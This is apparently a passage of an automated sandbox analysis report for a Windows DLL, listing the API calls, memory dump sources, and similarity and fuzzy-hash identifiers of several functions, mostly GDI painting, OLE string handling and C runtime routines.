                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6F214E89
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                    • Opcode ID: 2ea0549312cf1223af16b94c4b52d6e0507bd1745fca6a55fa0166405974ce47
                                                                                                                                                                                                                    • Instruction ID: 48640da6ce1da597513f481ef9481a58776a7ed5a1496d9af537f24ac1f610d3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ea0549312cf1223af16b94c4b52d6e0507bd1745fca6a55fa0166405974ce47
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731F4B5D0521D9BDB10DFA4C989BCDBBF8BF09304F1041AAE54DAA280EB715A848F45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F21465A,6F2393BC), ref: 6F21453F
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(6F21465A,?,6F21465A,6F2393BC), ref: 6F214548
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,6F21465A,6F2393BC), ref: 6F214553
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,6F21465A,6F2393BC), ref: 6F21455A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                    • Opcode ID: 91f0d017e2f0b30824869de7e6434bed54eb79948b2344dda9fed4c8560f07f7
                                                                                                                                                                                                                    • Instruction ID: e1eeca1558daa09e7ff21d9d8931c45ebec0da0b47e8c984cef119ce04324149
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91f0d017e2f0b30824869de7e6434bed54eb79948b2344dda9fed4c8560f07f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34D0CAB3000A08ABDF202BE0D80CA883B2AAB0B232F004000F74A96848CE738470DF65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6F208A77
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 6F208AA6
                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 6F208AB4
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208AFB
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F208B8E
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6F208BC7
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F208BDF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208C1A
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208C33
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F208CB4
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F208CBE
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6F208CDB
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F208CF0
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208CFF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208D88
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208DCC
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E0E
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E14
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208E1E
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(75C6D5B0), ref: 6F208E24
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$Variant_com_issue_error$AllocByteCharMultiWide$BstrClearCopyInit
                                                                                                                                                                                                                    • String ID: "$<x#o$lines$offsetY
                                                                                                                                                                                                                    • API String ID: 1469084953-2057679158
                                                                                                                                                                                                                    • Opcode ID: 0eeddfdab2741c62b0c30c1dc1bda0066ae21f3347b744bcf57c6f6e6e44ba1b
                                                                                                                                                                                                                    • Instruction ID: aef02ab872bcaa5270b0bc791e6fc56449449d565cc2ec583f70d0409bcd5d78
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eeddfdab2741c62b0c30c1dc1bda0066ae21f3347b744bcf57c6f6e6e44ba1b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26F181B2A0520EDBEB00DFA4C858BEFBBB8AF45719F104159E515EB280DB75E914CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                      • Part of subcall function 6F210DA0: GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6F2113C9,?,00000000,?), ref: 6F210E2E
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F2113FD
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211408
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211413
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F21141D
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 6F211424
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 6F211432
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSendText$BeginBitmapColorMetricsModeParent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1460541294-0
                                                                                                                                                                                                                    • Opcode ID: 052fc674b8219e0e74823a8e97704b73c3ceffc481109622ba526d91deef059a
                                                                                                                                                                                                                    • Instruction ID: 719ea93da6ddac0ccc5ad3cc9bf13629a239238e5d217a5d7fa7e0c83264cf85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 052fc674b8219e0e74823a8e97704b73c3ceffc481109622ba526d91deef059a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3614E72108B01AFDB20DF64C948B5BBBE9FF8A310F00491DF69592594CB71E964CF96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 6F2112A3
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 6F2112AC
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F2112C2
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 6F2112C8
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F2112EA
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 6F2112F6
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 6F211308
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F211321
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F21132F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 6F211338
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FFFFFF), ref: 6F211344
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F211356
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211364
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F211379
                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 6F21139B
                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6F2113FD
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211408
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 6F211413
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 6F21141D
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 6F211424
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 6F211432
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2796758630-0
                                                                                                                                                                                                                    • Opcode ID: 963e3a435a2d2760368ab5159490eda97c33aa8cf1a1e686edc393186cfd08f4
                                                                                                                                                                                                                    • Instruction ID: 02b4da9519d0424c24b1de5d74211409131eb798a888e119dcd3d437f5625b22
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 963e3a435a2d2760368ab5159490eda97c33aa8cf1a1e686edc393186cfd08f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD510C72108B41AFDB21DF64C948F6ABBE9FF8A310F00491DF69592560DB31A925CF92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20628F
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F20629B
                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2062E4
                                                                                                                                                                                                                    • GetCursor.USER32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206300
                                                                                                                                                                                                                    • CreateMenu.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206344
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20637B
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F206404
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F206387
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: GetCurrentThreadId.KERNEL32 ref: 6F206023
                                                                                                                                                                                                                    • CreateMenu.USER32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2063BD
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F2063F4
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetMessageTime.USER32 ref: 6F2060CE
                                                                                                                                                                                                                      • Part of subcall function 6F206090: IsSystemResumeAutomatic.KERNEL32 ref: 6F2060D4
                                                                                                                                                                                                                      • Part of subcall function 6F206090: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F2060F5
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F206101
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetSystemDefaultLangID.KERNEL32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20615B
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F2061B7
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetUserDefaultUILanguage.KERNEL32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206243
                                                                                                                                                                                                                      • Part of subcall function 6F206090: CreateMenu.USER32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206258
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: CreateMenu.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F205FE1
                                                                                                                                                                                                                      • Part of subcall function 6F205FB0: GetOpenClipboardWindow.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206017
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClipboardCreateCurrentMenuOpenThread$DefaultDesktopSystem$AutomaticCursorForegroundLangLanguageMessageResumeTimeUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 961900505-0
                                                                                                                                                                                                                    • Opcode ID: cde3e2bb95a7f9275834256aca2d7a3c991206ec05848aa88284f4141fbc3e03
                                                                                                                                                                                                                    • Instruction ID: e4365d2668ddd250599f7a4f0c1c9447bb96ed1c4b79497bc13bd9f815d79222
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde3e2bb95a7f9275834256aca2d7a3c991206ec05848aa88284f4141fbc3e03
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B39129B3914B0D8ED702B739C58931DF767AF9B364B148726E582B2890FF64A4E4CD40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6F207EE6
                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 6F207F18
                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6F207F40
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(-00000001), ref: 6F207F81
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6F207FE9
                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6F20800B
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208036
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208040
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208046
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F208050
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F20805A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _com_issue_error$StringVariant$Alloc$ChangeClearFreeInitType
                                                                                                                                                                                                                    • String ID: counter$name$page$value
                                                                                                                                                                                                                    • API String ID: 661817203-1733285648
                                                                                                                                                                                                                    • Opcode ID: 40efd1118bbee3d6582e04f488248cc70fb9d89fbac4114bf789de09557db92e
                                                                                                                                                                                                                    • Instruction ID: bd077cf010a476e4df77953abce44c084e04f09d7795629db81c258b4ecc7be8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40efd1118bbee3d6582e04f488248cc70fb9d89fbac4114bf789de09557db92e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251E7B290470FDBD720EF64C948B8ABBF8EF05714F20451AE955A7680D7B4E950CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6F2113C9,?,00000000,?), ref: 6F210E2E
                                                                                                                                                                                                                    • GetClientRect.USER32 ref: 6F21107F
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 6F2110E4
                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,00000000,00000048), ref: 6F2110F9
                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6F211119
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 6F211131
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 6F211139
                                                                                                                                                                                                                    • DrawTextW.USER32(?,?,?,?,00000000), ref: 6F211171
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 6F211179
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 6F211180
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectText$Select$CapsClientColorCreateDeleteDeviceDrawFontMetricsRect
                                                                                                                                                                                                                    • String ID: %s%d.%d%s$%s%s%s$[N/A]
                                                                                                                                                                                                                    • API String ID: 938400745-711029782
                                                                                                                                                                                                                    • Opcode ID: a60dbde8ea28fe371e80ba6bcf40f92a7d24070d396881006448ee81fcd0e619
                                                                                                                                                                                                                    • Instruction ID: dd76fc3104a9cac095fe195a7284cfef57e71f206ca5c6785c8aaabb2331f8fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a60dbde8ea28fe371e80ba6bcf40f92a7d24070d396881006448ee81fcd0e619
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70C190759042199BDB20CF24CCC5BDAB7B9FF49304F1481E9E609AB291DB30EA95CF64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F225FF7
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22600D
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22601E
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22602F
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226046
                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 6F22608E
                                                                                                                                                                                                                      • Part of subcall function 6F22D43E: _free.LIBCMT ref: 6F22D4A9
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226265
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226278
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226286
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F226291
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262D3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262DB
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262E3
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262EB
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2262F9
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,6F23C658,00000000,00000000,?,?,?,00000004,00000000,00000001,6F23C658,0000007F,?,?), ref: 6F22D638
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6F22D6AD
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F22D6BF
                                                                                                                                                                                                                      • Part of subcall function 6F22D5F0: __freea.LIBCMT ref: 6F22D6C8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 607174680-0
                                                                                                                                                                                                                    • Opcode ID: 79e4df6f7ab6475560c81a5cd113e874d254f1d34f7c3a1e109cdbca17257c2a
                                                                                                                                                                                                                    • Instruction ID: ee37701e2f5b6cbdc4391b5a203f56a9866fd725ea2422333dd510bc2491c1cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e4df6f7ab6475560c81a5cd113e874d254f1d34f7c3a1e109cdbca17257c2a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4C18D71D0434A9FDB11CFA8C880BEEBBF5FF09304F10416AE499AB691D775A9418F60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,A9775A74,75C6D5B0,00000000), ref: 6F208EE4
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F208EF2
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,A9775A74,75C6D5B0,00000000), ref: 6F208F0F
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F208F28
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F208F37
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F2091D4
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F209226
                                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 6F209234
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F209239
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(75C6D5B0), ref: 6F209244
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.809630222.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809624765.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809663328.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809676794.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.809682716.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$ByteCharMultiWide$AllocBstrConcurrency::cancel_current_task_com_issue_error
                                                                                                                                                                                                                    • String ID: Arial$line
                                                                                                                                                                                                                    • API String ID: 3866382671-367345269
                                                                                                                                                                                                                    • Opcode ID: 8310358d5525206c9e261aae3281d829493029b9ef5aa64dd352949e5bfbc2cf
                                                                                                                                                                                                                    • Instruction ID: f5bc65b3500ec8c2e48e22af8c849d0f1e10d0b3595c22858eb6d4dd4890d5dd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8310358d5525206c9e261aae3281d829493029b9ef5aa64dd352949e5bfbc2cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22E1CF72A0030EDFEB10DFA4C988B9EBBB5AF45314F10425DE416AB784D774AA54CFA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

